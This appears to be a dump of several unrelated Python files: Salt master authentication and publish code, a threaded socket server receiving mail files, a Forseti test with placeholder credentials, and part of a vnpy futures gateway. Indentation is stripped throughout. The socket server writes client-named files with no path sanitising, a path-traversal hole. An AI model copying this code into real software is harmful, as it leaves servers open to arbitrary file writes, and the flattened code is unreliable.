for line in fp_:
line = line.strip()
if line.startswith('#'):
continue
if line == keyid:
return True
if fnmatch.fnmatch(keyid, line):
return True
try:
if re.match(line, keyid):
return True
except re.error:
message = ('{0} is not a valid regular expression, '
'ignoring line in {1}')
log.warn(message.format(line, autosign_file))
continue
return False
def _auth(self, load):
'''
Authenticate the client, use the sent public key to encrypt the aes key
which was generated at start up.
This method fires an event over the master event manager. The event is
tagged "auth" and returns a dict with information about the auth
event
'''
# 0. Check for max open files
# 1. Verify that the key we are receiving matches the stored key
# 2. Store the key if it is not there
# 3. make an rsa key with the pub key
# 4. encrypt the aes key as an encrypted salt.payload
# 5. package the return and return it
salt.utils.verify.check_max_open_files(self.opts)
log.info('Authentication request from {id}'.format(**load))
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn):
# The key has been accepted check it
if not salt.utils.fopen(pubfn, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif not os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This is a new key, stick it in pre
log.info(
'New public key placed in pending for {id}'.format(**load)
)
with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': True}}
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
elif os.path.isfile(pubfn_pend)\
and not self._check_autosign(load['id']):
# This key is in pending, if it is the same key ret True, else
# ret False
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key'
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': True}}
elif os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This key is in pending, if it is the same key auto accept it
if not salt.utils.fopen(pubfn_pend, 'r').read() == load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an attempt to '
'compromise the Salt cluster.'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
elif not os.path.isfile(pubfn_pend)\
and self._check_autosign(load['id']):
# This is a new key and it should be automatically be accepted
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError, e:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, e))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port'],
}
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, 'auth')
return ret
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name],
clear_load['fun'])
if not good:
return ''
return self.wheel_.call_func(
clear_load.pop('fun'),
**clear_load)
except Exception as exc:
log.error(
('Exception occurred in the wheel system: {0}'
).format(exc)
)
return ''
def mk_token(self, clear_load):
'''
Create aand return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
if not 'eauth' in clear_load:
return ''
if not clear_load['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(clear_load)
if not name in self.opts['external_auth'][clear_load['eauth']]:
return ''
if not self.loadauth.time_auth(clear_load):
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
('Exception occured while authenticating: {0}'
).format(exc)
)
return ''
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# Check for external auth calls
if extra.get('token', False):
# A token was passwd, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
('Exception occured when generating auth token: {0}'
).format(exc)
)
return ''
if not token:
return ''
if not token['eauth'] in self.opts['external_auth']:
return ''
if not token['name'] in self.opts['external_auth'][token['eauth']]:
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
elif 'eauth' in extra:
if not extra['eauth'] in self.opts['external_auth']:
# The eauth system is not enabled, fail
return ''
try:
name = self.loadauth.load_name(extra)
if not name in self.opts['external_auth'][extra['eauth']]:
return ''
if not self.loadauth.time_auth(extra):
return ''
except Exception as exc:
log.error(
('Exception occured while authenticating: {0}'
).format(exc)
)
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][extra['eauth']][name],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if not clear_load.pop('key') == self.key[self.opts.get('user', 'root')]:
return ''
elif clear_load['user'] == 'root':
if not clear_load.pop('key') == self.key.get(self.opts.get('user', 'root')):
return ''
elif clear_load['user'] == getpass.getuser():
if not clear_load.pop('key') == self.key.get(clear_load['user']):
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if not clear_load.pop('key') == self.key[clear_load['user']]:
return ''
if not clear_load['user'] in self.opts['client_acl']:
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the cli will function cleanly
if not clear_load['fun'] == 'saltutil.find_job':
return ''
else:
return ''
else:
if not clear_load.pop('key') == self.key[getpass.getuser()]:
return ''
if not clear_load['jid']:
clear_load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
jid_dir = salt.utils.jid_dir(
clear_load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
# Verify the jid dir
if not os.path.isdir(jid_dir):
os.makedirs(jid_dir)
# Save the invocation information
self.serial.dump(
clear_load,
salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
)
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(('User {user} Published command {fun} with jid'
' {jid}').format(**clear_load))
load['user'] = clear_load['user']
else:
log.info(('Published command {fun} with jid'
' {jid}').format(**clear_load))
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
pub_sock.send(self.serial.dumps(payload))
minions = self.ckminions.check_minions(
load['tgt'],
load.get('tgt_type', 'glob')
)
try:
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
|
server.py
|
# coding: utf-8
import os
import sys
import socket
import threading
import buffer
from time import sleep
from scheduler import scheduler
class Receiver :
def __init__(self, host='0.0.0.0', port=6666):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print(msg)
sys.exit(1)
print('Server is ready...')
print('Waiting connection...')
while True:
conn, addr = s.accept()
connbuf = buffer.Buffer(conn)
recv_thread = threading.Thread(target = self.deal_data, args=(connbuf, addr))
recv_thread.start()
def deal_data(self, connbuf, addr):
print()
print("Got a connection from ", addr)
absolute_path = '/var/www/socialmails/schedule_server/'
connbuf.put_utf8('Hi, Welcome to the server!')
eml_type = connbuf.get_utf8()
eml_name = absolute_path+'eml/'+connbuf.get_utf8()
user_group = connbuf.get_utf8()
mail_excel = absolute_path+'excel/'+connbuf.get_utf8()
annex = absolute_path+'annex/'+connbuf.get_utf8()
datetime = connbuf.get_utf8()
absolute_path = '/var/www/socialmails/schedule_server/'
for file_name in [eml_name, mail_excel, annex]:
file_size = int(connbuf.get_utf8())
print('file size: ', file_size )
with open(file_name, 'wb') as f:
remaining = file_size
while remaining:
chunk_size = 4096 if remaining >= 4096 else remaining
chunk = connbuf.get_bytes(chunk_size)
if not chunk: break
f.write(chunk)
remaining -= len(chunk)
if remaining:
print(file_name,' incomplete. Missing',remaining,'bytes.')
else:
print(file_name,' received successfully.')
# print('All data ({0}, {1}, {2})'.format(eml_type, user_group, datetime))
print()
scheduler(datetime, [eml_type, eml_name, user_group, mail_excel, annex])
if __name__ == "__main__":
receiver = Receiver()
|
base_repository_test.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the base repository classes."""
import datetime
import threading
import unittest
from googleapiclient import discovery
from googleapiclient import http
import mock
import google.auth
from google.oauth2 import credentials
from google.oauth2 import service_account
from tests import unittest_utils
from google.cloud import forseti as forseti_security
from google.cloud.forseti.common.gcp_api import _base_repository as base
from google.cloud.forseti.common.gcp_api import _supported_apis
class BaseRepositoryTest(unittest_utils.ForsetiTestCase):
"""Test the Base Repository methods."""
def get_test_credential(self):
access_token = 'foo'
client_id = 'some_client_id'
client_secret = 'cOuDdkfjxxnv+'
refresh_token = '1/0/a.df219fjls0'
token_uri = 'https://example.com/oauth2/token'
token_expiry = datetime.datetime.utcnow()
user_agent = ''
creds = credentials.Credentials(
access_token, refresh_token=refresh_token,
token_uri=token_uri, client_id=client_id,
client_secret=client_secret, scopes=['foo'])
creds.expiry = token_expiry
return creds
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def get_test_service_account(self, mock_signer):
keyfile_dict = {
'type': 'service_account',
'client_email': 'test@service.account',
'private_key': '12345',
'private_key_id': '12345',
'client_id': '123',
'token_uri': 'https://example.com/oauth2/token'}
creds = (
service_account.Credentials.from_service_account_info(
keyfile_dict))
return creds
def test_build_http(self):
"""Verify set user agent sets the user agent correctly."""
http_mock = http.HttpMock()
h = base._build_http(http=http_mock)
_ = h.request('http://test.foo', 'GET')
self.assertTrue(
forseti_security.__package_name__ in
h.headers.get('user-agent'))
def test_set_scopes(self):
creds = self.get_test_service_account()
self.assertTrue(creds.requires_scopes)
scoped_creds = base.with_scopes_if_required(
creds, list(base.CLOUD_SCOPES))
self.assertFalse(scoped_creds.requires_scopes)
@mock.patch.object(discovery, 'build', autospec=True)
def test_forseti_supported_api_is_ok(
self,
mock_discovery_build):
"""Test that Forseti-supported API in BaseClient.__init__() works.
Args:
mock_discovery_build (Mock): Mock object.
Setup:
* Pick one of the supported APIs.
* Instantiate the Base Client with just the API name.
Expect:
* The resulting API client service has the same API name and
version as the supported API.
"""
api_name = _supported_apis.SUPPORTED_APIS.keys()[0]
supported_api = _supported_apis.SUPPORTED_APIS[api_name]
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials)
self.assertEqual((api_name, [supported_api['default_version']]),
(repo_client.name, repo_client.versions))
@mock.patch.object(discovery, 'build', autospec=True)
@mock.patch.object(base, 'LOGGER', autospec=True)
def test_forseti_unsupported_valid_version_is_ok(
self,
mock_logger,
mock_discovery_build):
"""Test that Forseti-supported API with unsupported valid version is ok.
Args:
mock_logger (Mock): Mock objects.
mock_discovery_build (Mock): Mock object.
Setup:
* Pick one of the supported APIs.
* Pick a valid version (not officially supported by Forseti).
* Instantiate the Base Client with the API name and version.
Expect:
* Unsupported version will call LOGGER.warn().
"""
api_name = 'cloudresourcemanager'
self.assertTrue(api_name in _supported_apis.SUPPORTED_APIS)
provided_version = 'v1beta1'
self.assertFalse(
provided_version in
_supported_apis.SUPPORTED_APIS[api_name]['supported_versions'])
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials, versions=[provided_version])
self.assertEqual((api_name, [provided_version]),
(repo_client.name, repo_client.versions))
mock_logger.warn.assert_called_with(
mock.ANY, api_name, provided_version)
@mock.patch.object(discovery, 'build', autospec=True)
@mock.patch.object(base, 'LOGGER', autospec=True)
def test_forseti_unsupported_api_is_ok(
self,
mock_logger,
mock_discovery_build):
"""Test that unsupported API is ok.
Args:
mock_logger (Mock): Mock objects.
mock_discovery_build (Mock): Mock object.
Setup:
* Pick a non-supported API.
* Pick a valid version (not officially supported by Forseti).
* Instantiate the Base Client with the API name and version.
Expect:
* Unsupported API will call LOGGER.warn().
"""
api_name = 'zoo'
self.assertFalse(api_name in _supported_apis.SUPPORTED_APIS)
provided_versions = ['v1', 'v2']
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
api_name, credentials=mock_credentials, versions=provided_versions)
expected_repr = 'API: name=zoo, versions=[\'v1\', \'v2\']'
self.assertEqual(expected_repr, '%s' % repo_client)
mock_logger.warn.assert_called_with(
mock.ANY, api_name)
@mock.patch.object(discovery, 'build', autospec=True)
def test_init_repository_no_supported_version(self, mock_discovery_build):
"""Verify that _init_repository will pick a version if none provided."""
class ZooRepository(base.GCPRepository):
def __init__(self, **kwargs):
super(ZooRepository, self).__init__(component='a', **kwargs)
# Return a different mock object each time build is called.
mock_discovery_build.side_effect = [mock.Mock(), mock.Mock()]
mock_credentials = mock.MagicMock()
repo_client = base.BaseRepositoryClient(
'zoo', credentials=mock_credentials, versions=['v2', 'v1'])
repo = repo_client._init_repository(ZooRepository)
self.assertEqual(repo_client.gcp_services['v1'], repo.gcp_service)
self.assertNotEqual(repo_client.gcp_services['v2'], repo.gcp_service)
def test_multiple_threads_unique_http_objects(self):
"""Validate that each thread gets its unique http object.
At the core of this requirement is the fact that httplib2.Http is not
thread-safe. Therefore, it is the responsibility of the repo to maintain
a separate http object even if multiplethreads share it.
"""
def get_http(repo, result, i):
result[i] = repo.http
gcp_service_mock = mock.Mock()
credentials_mock = mock.Mock(spec=credentials.Credentials)
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=credentials_mock,
component='fake_component',
use_cached_http=True)
http_objects = [None] * 2
t1 = threading.Thread(target=get_http, args=(repo, http_objects, 0))
t2 = threading.Thread(target=get_http, args=(repo, http_objects, 1))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertNotEqual(http_objects[0], http_objects[1])
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def test_no_cached_http_gets_different_http_objects(self, signer_factory):
"""Validate that each unique credential gets a unique http object.
At the core of this requirement is the fact that some API's require
distinctly scoped credentials, whereas the authenticated http object
is cached for all clients in the same thread.
"""
http_objects = [None] * 2
for i in range(2):
gcp_service_mock = mock.Mock()
fake_credentials = self.get_test_credential()
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=fake_credentials,
component='fake_component{}'.format(i),
use_cached_http=False)
http_objects[i] = repo.http
self.assertNotEqual(http_objects[0], http_objects[1])
@mock.patch('google.auth.crypt.rsa.RSASigner.from_string',
return_value=object())
def test_use_cached_http_gets_same_http_objects(self, signer_factory):
"""Different clients with the same credential get the same http object.
This verifies that a new http object is not created when two
repository clients use the same credentials object.
"""
fake_credentials = self.get_test_credential()
http_objects = [None] * 2
for i in range(2):
gcp_service_mock = mock.Mock()
repo = base.GCPRepository(
gcp_service=gcp_service_mock,
credentials=fake_credentials,
component='fake_component{}'.format(i),
use_cached_http=True)
http_objects[i] = repo.http
self.assertEqual(http_objects[0], http_objects[1])
if __name__ == '__main__':
unittest.main()
|
rohon_gateway.py
|
"""
"""
import sys
import json
import traceback
from datetime import datetime, timedelta
from copy import copy,deepcopy
from functools import lru_cache
from typing import List
import pandas as pd
from .vnctpmd import MdApi
from .vnctptd import TdApi
from .ctp_constant import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType,
Interval
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
BarData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.utility import (
extract_vt_symbol,
get_folder_path,
get_trading_date,
get_underlying_symbol,
round_to,
BarGenerator,
print_dict
)
from vnpy.trader.event import EVENT_TIMER
# 增加通达信指数接口行情
from time import sleep
from threading import Thread
from pytdx.exhq import TdxExHq_API
from vnpy.amqp.consumer import subscriber
from vnpy.data.tdx.tdx_common import (
TDX_FUTURE_HOSTS,
get_future_contracts,
save_future_contracts,
get_cache_json,
save_cache_json,
TDX_FUTURE_CONFIG)
from vnpy.component.base import (
MARKET_DAY_ONLY, NIGHT_MARKET_23, NIGHT_MARKET_SQ2
)
STATUS_ROHON2VT = {
THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
THOST_FTDC_OAS_Rejected: Status.REJECTED,
THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
THOST_FTDC_OST_Canceled: Status.CANCELLED
}
DIRECTION_VT2ROHON = {
Direction.LONG: THOST_FTDC_D_Buy,
Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_ROHON2VT = {v: k for k, v in DIRECTION_VT2ROHON.items()}
DIRECTION_ROHON2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_ROHON2VT[THOST_FTDC_PD_Short] = Direction.SHORT
ORDERTYPE_VT2ROHON = {
OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_ROHON2VT = {v: k for k, v in ORDERTYPE_VT2ROHON.items()}
OFFSET_VT2ROHON = {
Offset.OPEN: THOST_FTDC_OF_Open,
Offset.CLOSE: THOST_FTDC_OFEN_Close,
Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_ROHON2VT = {v: k for k, v in OFFSET_VT2ROHON.items()}
EXCHANGE_ROHON2VT = {
"CFFEX": Exchange.CFFEX,
"SHFE": Exchange.SHFE,
"CZCE": Exchange.CZCE,
"DCE": Exchange.DCE,
"INE": Exchange.INE,
"SPD": Exchange.SPD
}
PRODUCT_ROHON2VT = {
THOST_FTDC_PC_Futures: Product.FUTURES,
THOST_FTDC_PC_Options: Product.OPTION,
THOST_FTDC_PC_Combination: Product.SPREAD
}
OPTIONTYPE_ROHON2VT = {
THOST_FTDC_CP_CallOptions: OptionType.CALL,
THOST_FTDC_CP_PutOptions: OptionType.PUT
}
MAX_FLOAT = sys.float_info.max
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
index_contracts = {}
# tdx 期货配置本地缓存
future_contracts = get_future_contracts()
# 时间戳对齐
TIME_GAP = 8 * 60 * 60 * 1000000000
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
TQ2VT_TYPE = {
"FUTURE_OPTION": Product.OPTION,
"INDEX": Product.INDEX,
"FUTURE_COMBINE": Product.SPREAD,
"SPOT": Product.SPOT,
"FUTURE_CONT": Product.INDEX,
"FUTURE": Product.FUTURES,
"FUTURE_INDEX": Product.INDEX,
"OPTION": Product.OPTION,
}
@lru_cache(maxsize=9999)
def vt_to_tq_symbol(symbol: str, exchange: Exchange) -> str:
"""
TQSdk exchange first
"""
for count, word in enumerate(symbol):
if word.isdigit():
break
fix_symbol = symbol
if exchange in [Exchange.INE, Exchange.SHFE, Exchange.DCE]:
fix_symbol = symbol.lower()
# Check for index symbol
time_str = symbol[count:]
if time_str in ["88"]:
return f"KQ.m@{exchange.value}.{fix_symbol[:count]}"
if time_str in ["99"]:
return f"KQ.i@{exchange.value}.{fix_symbol[:count]}"
return f"{exchange.value}.{fix_symbol}"
@lru_cache(maxsize=9999)
def tq_to_vt_symbol(tq_symbol: str) -> str:
""""""
if "KQ.m" in tq_symbol:
ins_type, instrument = tq_symbol.split("@")
exchange, symbol = instrument.split(".")
return f"{symbol}88.{exchange}"
elif "KQ.i" in tq_symbol:
ins_type, instrument = tq_symbol.split("@")
exchange, symbol = instrument.split(".")
return f"{symbol}99.{exchange}"
else:
exchange, symbol = tq_symbol.split(".")
return f"{symbol}.{exchange}"
class RohonGateway(BaseGateway):
"""
VN Trader Gateway for ROHON .
"""
default_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
# 注
# 如果采用rabbit_mq拓展tdx指数行情,default_setting中,需要增加:
# "rabbit":
# {
# "host": "192.168.1.211",
# "exchange": "x_fanout_idx_tick"
# }
exchanges = list(EXCHANGE_ROHON2VT.values())
def __init__(self, event_engine, gateway_name="ROHON"):
"""Constructor"""
super().__init__(event_engine, gateway_name)
self.td_api = None
self.md_api = None
self.tdx_api = None
self.rabbit_api = None
self.tq_api = None
# 是否输出debug信息
self.debug = False
self.subscribed_symbols = set() # 已订阅合约代码
self.combiner_conf_dict = {} # 保存合成器配置
# 自定义价差/加比的tick合成器
self.combiners = {}
self.tick_combiner_map = {}
def connect(self, setting: dict):
""""""
userid = setting["用户名"]
password = setting["密码"]
brokerid = setting["经纪商代码"]
td_address = setting["交易服务器"]
md_address = setting["行情服务器"]
appid = setting["产品名称"]
auth_code = setting["授权编码"]
product_info = setting["产品信息"]
rabbit_dict = setting.get('rabbit', None)
tq_dict = setting.get('tq', None)
self.debug = setting.get('debug',False)
if not td_address.startswith("tcp://"):
td_address = "tcp://" + td_address
if not md_address.startswith("tcp://"):
md_address = "tcp://" + md_address
# 获取自定义价差/价比合约的配置
try:
from vnpy.trader.engine import CustomContract
c = CustomContract()
self.combiner_conf_dict = c.get_config()
if len(self.combiner_conf_dict) > 0:
self.write_log(u'加载的自定义价差/价比配置:{}'.format(self.combiner_conf_dict))
contract_dict = c.get_contracts()
for vt_symbol, contract in contract_dict.items():
contract.gateway_name = self.gateway_name
symbol_exchange_map[contract.symbol] = contract.exchange
self.on_contract(contract)
except Exception as ex: # noqa
pass
if not self.td_api:
self.td_api = RohonTdApi(self)
self.td_api.connect(td_address, userid, password, brokerid, auth_code, appid, product_info)
if not self.md_api:
self.md_api = RohonMdApi(self)
self.md_api.connect(md_address, userid, password, brokerid)
if rabbit_dict:
self.write_log(f'激活RabbitMQ行情接口')
self.rabbit_api = SubMdApi(gateway=self)
self.rabbit_api.connect(rabbit_dict)
elif tq_dict is not None:
self.write_log(f'激活天勤行情接口')
self.tq_api = TqMdApi(gateway=self)
self.tq_api.connect(tq_dict)
else:
self.write_log(f'激活通达信行情接口')
self.tdx_api = TdxMdApi(gateway=self)
self.tdx_api.connect()
self.init_query()
for (vt_symbol, is_bar) in list(self.subscribed_symbols):
symbol, exchange = extract_vt_symbol(vt_symbol)
req = SubscribeRequest(
symbol=symbol,
exchange=exchange,
is_bar=is_bar
)
# 指数合约,从tdx行情、天勤订阅
if req.symbol[-2:] in ['99']:
req.symbol = req.symbol.upper()
if self.tdx_api is not None:
self.write_log(u'有指数订阅,连接通达信行情服务器')
self.tdx_api.connect()
self.tdx_api.subscribe(req)
elif self.rabbit_api is not None:
# 使用rabbitmq获取
self.rabbit_api.subscribe(req)
elif self.tq_api:
# 使用天勤行情获取
self.tq_api.subscribe(req)
else:
# 上期所、上能源支持五档行情,使用天勤接口
if self.tq_api and req.exchange in [Exchange.SHFE, Exchange.INE]:
self.write_log(f'使用天勤接口订阅')
self.tq_api.subscribe(req)
else:
self.md_api.subscribe(req)
def check_status(self):
"""检查状态"""
if self.td_api.connect_status and self.md_api.connect_status:
self.status.update({'con': True})
if self.tdx_api:
self.tdx_api.check_status()
if self.tdx_api is None or self.md_api is None:
return False
if not self.td_api.connect_status or self.md_api.connect_status:
return False
return True
def subscribe(self, req: SubscribeRequest):
""""""
try:
if self.md_api:
# 如果是自定义的套利合约符号
if req.symbol in self.combiner_conf_dict:
self.write_log(u'订阅自定义套利合约:{}'.format(req.symbol))
# 创建合成器
if req.symbol not in self.combiners:
setting = self.combiner_conf_dict.get(req.symbol)
setting.update({"symbol": req.symbol})
combiner = TickCombiner(self, setting)
# 更新合成器
self.write_log(u'添加{}与合成器映射'.format(req.symbol))
self.combiners.update({setting.get('symbol'): combiner})
# 增加映射( leg1 对应的合成器列表映射)
leg1_symbol = setting.get('leg1_symbol')
leg1_exchange = Exchange(setting.get('leg1_exchange'))
combiner_list = self.tick_combiner_map.get(leg1_symbol, [])
if combiner not in combiner_list:
